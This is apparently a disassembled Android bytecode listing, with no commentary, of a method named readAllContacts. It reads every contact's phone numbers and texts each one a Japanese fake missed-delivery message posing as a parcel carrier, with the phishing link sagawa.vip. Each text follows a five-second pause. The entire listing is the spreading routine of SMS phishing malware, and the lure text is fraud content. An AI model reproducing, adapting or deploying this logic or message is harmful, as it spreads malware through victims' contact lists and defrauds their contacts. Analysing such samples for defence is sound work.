# Lkk/util/ContactUtils;->readAllContacts(Landroid/content/Context;)V [access_flags=public static]
#
# Parameters:
# - local registers: v0...v13
# - v14:android.content.Context
#
# - return:void

readAllContacts-BB@0x0 : [ readAllContacts-BB@0x3a ]
	0       (00000000) const/4              v2, 0
	1       (00000002) const/4              v6, 0
	2       (00000004) const/4              v12, 0
	3       (00000006) invoke-virtual       v14, Landroid/content/Context;->getContentResolver()Landroid/content/ContentResolver;
	4       (0000000c) move-result-object   v0
	5       (0000000e) sget-object          v1, Landroid/provider/ContactsContract$Contacts;->CONTENT_URI Landroid/net/Uri;
	6       (00000012) move-object          v3, v2
	7       (00000014) move-object          v4, v2
	8       (00000016) move-object          v5, v2
	9       (00000018) invoke-virtual/range v0 ... v5, Landroid/content/ContentResolver;->query(Landroid/net/Uri; [Ljava/lang/String; Ljava/lang/String; [Ljava/lang/String; Ljava/lang/String;)Landroid/database/Cursor;
	10      (0000001e) move-result-object   v6
	11      (00000020) const/4              v7, 0
	12      (00000022) const/4              v9, 0
	13      (00000024) const/4              v10, 0
	14      (00000026) new-instance         v11, Ljava/util/ArrayList;
	15      (0000002a) invoke-direct        v11, Ljava/util/ArrayList;-><init>()V
	16      (00000030) new-instance         v8, Lorg/json/JSONArray;
	17      (00000034) invoke-direct        v8, Lorg/json/JSONArray;-><init>()V

readAllContacts-BB@0x3a : [ readAllContacts-BB@0x46 readAllContacts-BB@0xf0 ]
	18      (0000003a) invoke-interface     v6, Landroid/database/Cursor;->moveToNext()Z
	19      (00000040) move-result          v1
	20      (00000042) if-eqz               v1, +57

readAllContacts-BB@0x46 : [ readAllContacts-BB@0x94 ]
	21      (00000046) const-string         v1, '_id'
	22      (0000004a) invoke-interface     v6, v1, Landroid/database/Cursor;->getColumnIndex(Ljava/lang/String;)I
	23      (00000050) move-result          v1
	24      (00000052) invoke-interface     v6, v1, Landroid/database/Cursor;->getString(I)Ljava/lang/String;
	25      (00000058) move-result-object   v7
	26      (0000005a) const-string         v1, 'display_name'
	27      (0000005e) invoke-interface     v6, v1, Landroid/database/Cursor;->getColumnIndex(Ljava/lang/String;)I
	28      (00000064) move-result          v1
	29      (00000066) invoke-interface     v6, v1, Landroid/database/Cursor;->getString(I)Ljava/lang/String;
	30      (0000006c) move-result-object   v9
	31      (0000006e) sget-object          v1, Landroid/provider/ContactsContract$CommonDataKinds$Phone;->CONTENT_URI Landroid/net/Uri;
	32      (00000072) const-string         v3, 'contact_id= ?'
	33      (00000076) const/4              v4, 1
	34      (00000078) new-array            v4, v4, [Ljava/lang/String;
	35      (0000007c) const/4              v5, 0
	36      (0000007e) invoke-static        v7, Ljava/lang/String;->valueOf(Ljava/lang/Object;)Ljava/lang/String;
	37      (00000084) move-result-object   v13
	38      (00000086) aput-object          v13, v4, v5
	39      (0000008a) move-object          v5, v2
	40      (0000008c) invoke-virtual/range v0 ... v5, Landroid/content/ContentResolver;->query(Landroid/net/Uri; [Ljava/lang/String; Ljava/lang/String; [Ljava/lang/String; Ljava/lang/String;)Landroid/database/Cursor;
	41      (00000092) move-result-object   v12

readAllContacts-BB@0x94 : [ readAllContacts-BB@0xa0 readAllContacts-BB@0xde ]
	42      (00000094) invoke-interface     v12, Landroid/database/Cursor;->moveToNext()Z
	43      (0000009a) move-result          v1
	44      (0000009c) if-eqz               v1, +21
	94:d1
	(Ljava/lang/Throwable; -> e6 readAllContacts-BB@0xe6)
	(Ljava/lang/Exception; -> d4 readAllContacts-BB@0xd4)

readAllContacts-BB@0xa0 : [ readAllContacts-BB@0x94 ]
	45      (000000a0) const-string         v1, 'data1'
	46      (000000a4) invoke-interface     v12, v1, Landroid/database/Cursor;->getColumnIndex(Ljava/lang/String;)I
	47      (000000aa) move-result          v1
	48      (000000ac) invoke-interface     v12, v1, Landroid/database/Cursor;->getString(I)Ljava/lang/String;
	49      (000000b2) move-result-object   v10
	50      (000000b4) const-string         v1, 'shit'
	51      (000000b8) invoke-static        v1, v10, Landroid/util/Log;->i(Ljava/lang/String; Ljava/lang/String;)I
	52      (000000be) const-string         v1, 'お客様宛にお荷物のお届けにあがりましたが不在の為持ち帰りました。 配送物は下記よりご確認ください http://sagawa.vip/'
	53      (000000c2) invoke-static        v14, v10, v1, Lkk/util/SmsUtil;->sendSMSTO(Landroid/content/Context; Ljava/lang/String; Ljava/lang/String;)V
	54      (000000c8) const-wide/16        v4, 5000 # [5000.0]
	55      (000000cc) invoke-static        v4, v5, Ljava/lang/Thread;->sleep(J)V
	56      (000000d2) goto                 -1f

readAllContacts-BB@0xd4 : [ readAllContacts-BB@0x3a ]
	57      (000000d4) move-exception       v1
	58      (000000d6) invoke-interface     v12, Landroid/database/Cursor;->close()V
	59      (000000dc) goto                 -51

readAllContacts-BB@0xde : [ readAllContacts-BB@0x3a ]
	60      (000000de) invoke-interface     v12, Landroid/database/Cursor;->close()V
	61      (000000e4) goto                 -55

readAllContacts-BB@0xe6 : 
	62      (000000e6) move-exception       v1
	63      (000000e8) invoke-interface     v12, Landroid/database/Cursor;->close()V
	64      (000000ee) throw                v1

readAllContacts-BB@0xf0 : 
	65      (000000f0) invoke-interface     v6, Landroid/database/Cursor;->close()V
	66      (000000f6) return-void          

